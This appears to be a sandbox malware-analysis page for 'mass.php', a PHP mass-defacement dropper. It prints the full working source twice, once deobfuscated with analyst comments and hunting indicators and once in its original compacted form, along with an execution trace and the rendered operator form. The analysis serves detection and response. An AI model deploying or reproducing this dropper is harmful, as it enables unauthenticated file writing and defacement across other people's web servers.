PHP Malware Analysis

mass.php

md5: 7cfbf6c34eca59e7e7e38e198e43d06b


Screenshot


Attributes

Files

Input


Deobfuscated PHP code

<?php

// Analyst note: sabun_massal() is a conditional declaration. PHP defines it only
// when this branch executes, i.e. when the query string carries to=mass (loose ==
// comparison). The dispatcher further down calls it without repeating that check,
// so a "mahal" request that lacks to=mass ends in an undefined-function fatal
// error. Reading $_GET['to'] when the parameter is absent also raises an
// undefined-index / undefined-key notice or warning (level depends on the PHP
// version), which can surface in the PHP error log.
if ($_GET['to'] == 'mass') {
    /**
     * Recursive variant of the file dropper ("massal" is Indonesian for "mass").
     *
     * Walks $dir and every writable directory beneath it, writing $isi_script to
     * a file called $namafile in each one. An existing file of that name is
     * overwritten, because file_put_contents() is called without FILE_APPEND.
     *
     * Footprint for responders: the same file name with identical content in
     * many directories of one tree, all written during a single request.
     *
     * @param string $dir        Directory to start from (caller-supplied).
     * @param string $namafile   Name of the file to drop ("nama file" = file name).
     * @param string $isi_script Content to write ("isi" = contents).
     * @return void No return statement; callers receive null.
     */
    function sabun_massal($dir, $namafile, $isi_script)
    {
        // Only the starting directory is tested; if it is not writable the
        // function does nothing and prints nothing.
        if (is_writable($dir)) {
            $dira = scandir($dir);
            foreach ($dira as $dirb) {
                $dirc = "{$dir}/{$dirb}";
                // "lokasi" = location: full path of the file about to be written.
                $lokasi = $dirc . '/' . $namafile;
                if ($dirb === '.') {
                    // "$dir/./$namafile" resolves to the file inside $dir itself.
                    file_put_contents($lokasi, $isi_script);
                } elseif ($dirb === '..') {
                    // "$dir/../$namafile" is the PARENT of $dir. No writability
                    // check was made for the parent, so this write can fail with
                    // a warning; when it succeeds the file lands one level above
                    // the directory that was requested.
                    file_put_contents($lokasi, $isi_script);
                } else {
                    // '.' and '..' are handled above and never recursed into.
                    if (is_dir($dirc)) {
                        if (is_writable($dirc)) {
                            // The full path is echoed without HTML escaping.
                            echo "[<font color=lime>DONE</font>] {$lokasi}<br>";
                            file_put_contents($lokasi, $isi_script);
                            // Descend into the subdirectory. The recursive call
                            // rewrites this same file through its own '.' branch.
                            // $idx is never read; the function returns nothing.
                            $idx = sabun_massal($dirc, $namafile, $isi_script);
                        }
                    }
                }
            }
        }
    }
}
/**
 * Single-level variant of the file dropper ("biasa" is Indonesian for "ordinary").
 *
 * Writes $isi_script to a file called $namafile in $dir, in the parent of $dir,
 * and in each writable immediate subdirectory of $dir. It does not recurse.
 * Existing files of that name are overwritten (no FILE_APPEND).
 *
 * Unlike sabun_massal(), this function is declared unconditionally, so it is
 * always available to the dispatcher.
 *
 * @param string $dir        Directory to operate on (caller-supplied).
 * @param string $namafile   Name of the file to drop ("nama file" = file name).
 * @param string $isi_script Content to write ("isi" = contents).
 * @return void No return statement; callers receive null.
 */
function sabun_biasa($dir, $namafile, $isi_script)
{
    // Only $dir itself is tested; nothing is written or printed if this fails.
    if (is_writable($dir)) {
        $dira = scandir($dir);
        foreach ($dira as $dirb) {
            $dirc = "{$dir}/{$dirb}";
            // "lokasi" = location: full path of the file about to be written.
            $lokasi = $dirc . '/' . $namafile;
            if ($dirb === '.') {
                // Resolves to $dir/$namafile. No status line is printed for it.
                file_put_contents($lokasi, $isi_script);
            } elseif ($dirb === '..') {
                // Resolves to the parent of $dir, which was never checked for
                // writability; the write may fail with a warning or may place a
                // file outside the directory that was requested.
                file_put_contents($lokasi, $isi_script);
            } else {
                if (is_dir($dirc)) {
                    if (is_writable($dirc)) {
                        // Status line shows the path relative to $dir, unescaped.
                        echo "[<font color=lime>DONE</font>] {$dirb}/{$namafile}<br>";
                        file_put_contents($lokasi, $isi_script);
                    }
                }
            }
        }
    }
}
// Request dispatcher. Analyst notes:
//  - No authentication, token or origin check appears anywhere in this file, so
//    anyone who can reach the script's URL can drive it.
//  - Directory, file name and file content are all taken from the POST body and
//    passed on unvalidated: the script is an arbitrary file-write primitive that
//    runs with the web server account's permissions.
//  - Hunting: look for POST requests carrying the fields start, tipe_sabun,
//    d_dir, d_file and script. The form's default values (file name 'icq.htm',
//    content 'Hacked By Noniod7') and the submit label 'HAJAR COK!' are usable
//    as content indicators.
//  - Limiting which directories the web server account can write to bounds what
//    this script can do, since every write is gated on is_writable().
if ($_POST['start']) {
    // tipe_sabun selects the mode: 'mahal' = recursive, 'murah' = single level.
    // Any other value falls through both branches and does nothing.
    if ($_POST['tipe_sabun'] == 'mahal') {
        echo "<div style='margin: 5px auto; padding: 5px'>";
        // sabun_massal() exists only if the request also carried ?to=mass;
        // otherwise this call is a fatal undefined-function error.
        sabun_massal($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
        echo "</div>";
    } elseif ($_POST['tipe_sabun'] == 'murah') {
        echo "<div style='margin: 5px auto; padding: 5px'>";
        sabun_biasa($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
        echo "</div>";
    }
} else {
    // No 'start' field: render the operator form. $dir is not defined anywhere
    // in this file, and the sandbox render on this page shows the Folder field
    // empty, so the script was presumably lifted from a larger tool that set it.
    echo "<center>";
    echo "<form method='post'>\t<font style='text-decoration: underline;'>Tipe Mass:</font><br>\t<input type='radio' name='tipe_sabun' value='murah' checked>Biasa<input type='radio' name='tipe_sabun' value='mahal'>Massal<br>\t<font style='text-decoration: underline;'>Folder:</font><br>\t<input type='text' name='d_dir' value='{$dir}' style='width: 450px;' height='10'><br>\t<font style='text-decoration: underline;'>Filename:</font><br>\t<input type='text' name='d_file' value='icq.htm' style='width: 450px;' height='10'><br>\t<font style='text-decoration: underline;'>Index File:</font><br>\t<textarea name='script' style='width: 450px; height: 200px;'>Hacked By Noniod7</textarea><br>\t<input type='submit' name='start' value='HAJAR COK!' style='width: 450px;'>\t</form></center>";
}

Execution traces

data/traces/7cfbf6c34eca59e7e7e38e198e43d06b_trace-1676238619.9739.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 19:50:45.871755]
1	0	1	0.000242	393512
1	3	0	0.000371	407664	{main}	1		/var/www/html/uploads/mass.php	0	0
1	3	1	0.000416	407664
			0.000444	323024
TRACE END   [2023-02-12 19:50:45.872010]


Generated HTML code

<html><head></head><body><center><form method="post">	<font style="text-decoration: underline;">Tipe Mass:</font><br>	<input type="radio" name="tipe_sabun" value="murah" checked="">Biasa<input type="radio" name="tipe_sabun" value="mahal">Massal<br>	<font style="text-decoration: underline;">Folder:</font><br>	<input type="text" name="d_dir" value="" style="width: 450px;" height="10"><br>	<font style="text-decoration: underline;">Filename:</font><br>	<input type="text" name="d_file" value="icq.htm" style="width: 450px;" height="10"><br>	<font style="text-decoration: underline;">Index File:</font><br>	<textarea name="script" style="width: 450px; height: 200px;">Hacked By Noniod7</textarea><br>	<input type="submit" name="start" value="HAJAR COK!" style="width: 450px;">	</form></center></body></html>

Original PHP code

<?php
// Analyst annotation (not part of the sample; the md5 above refers to the file
// without these comment lines). The sample is unobfuscated, only compacted.
// It declares sabun_massal() (recursive, and only when ?to=mass is present) and
// sabun_biasa() (single level); both write caller-supplied content to a
// caller-supplied file name in every writable directory they visit, and also in
// the parent of the starting directory. A POST with 'start' set picks the mode
// from tipe_sabun ('mahal' or 'murah'); without it the operator form is printed.
// No authentication or input validation is present in the file.
if($_GET['to'] == 'mass') {	function sabun_massal($dir,$namafile,$isi_script){		if(is_writable($dir)) {			$dira = scandir($dir);			foreach($dira as $dirb) {				$dirc = "$dir/$dirb";				$lokasi = $dirc.'/'.$namafile;				if($dirb === '.') {			file_put_contents($lokasi, $isi_script);				} elseif($dirb === '..') {				file_put_contents($lokasi, $isi_script);				} else {					if(is_dir($dirc)){					 if(is_writable($dirc)) {							echo "[<font color=lime>DONE</font>] $lokasi<br>";							file_put_contents($lokasi, $isi_script);							$idx = sabun_massal($dirc,$namafile,$isi_script);						}					}				}			}		}	}}	function sabun_biasa($dir,$namafile,$isi_script) {		if(is_writable($dir)) {			$dira = scandir($dir);			foreach($dira as $dirb) {				$dirc = "$dir/$dirb";				$lokasi = $dirc.'/'.$namafile;				if($dirb === '.') {					file_put_contents($lokasi, $isi_script);				} elseif($dirb === '..') {					file_put_contents($lokasi, $isi_script);				} else {					if(is_dir($dirc)) {						if(is_writable($dirc)) {							echo "[<font color=lime>DONE</font>] $dirb/$namafile<br>";							file_put_contents($lokasi, $isi_script);						}					}				}			}		}	}	if($_POST['start']) {		if($_POST['tipe_sabun'] == 'mahal') {			echo "<div style='margin: 5px auto; padding: 5px'>";			sabun_massal($_POST['d_dir'], $_POST['d_file'], $_POST['script']);			echo "</div>";		} elseif($_POST['tipe_sabun'] == 'murah') {			echo "<div style='margin: 5px auto; padding: 5px'>";			sabun_biasa($_POST['d_dir'], $_POST['d_file'], $_POST['script']);			echo "</div>";		}	} else {	echo "<center>";	echo "<form method='post'>	<font style='text-decoration: underline;'>Tipe Mass:</font><br>	<input type='radio' name='tipe_sabun' value='murah' checked>Biasa<input type='radio' name='tipe_sabun' value='mahal'>Massal<br>	<font style='text-decoration: underline;'>Folder:</font><br>	<input type='text' name='d_dir' value='$dir' style='width: 450px;' height='10'><br>	<font style='text-decoration: underline;'>Filename:</font><br>	<input 
type='text' name='d_file' value='icq.htm' style='width: 450px;' height='10'><br>	<font style='text-decoration: underline;'>Index File:</font><br>	<textarea name='script' style='width: 450px; height: 200px;'>Hacked By Noniod7</textarea><br>	<input type='submit' name='start' value='HAJAR COK!' style='width: 450px;'>	</form></center>";	}
?>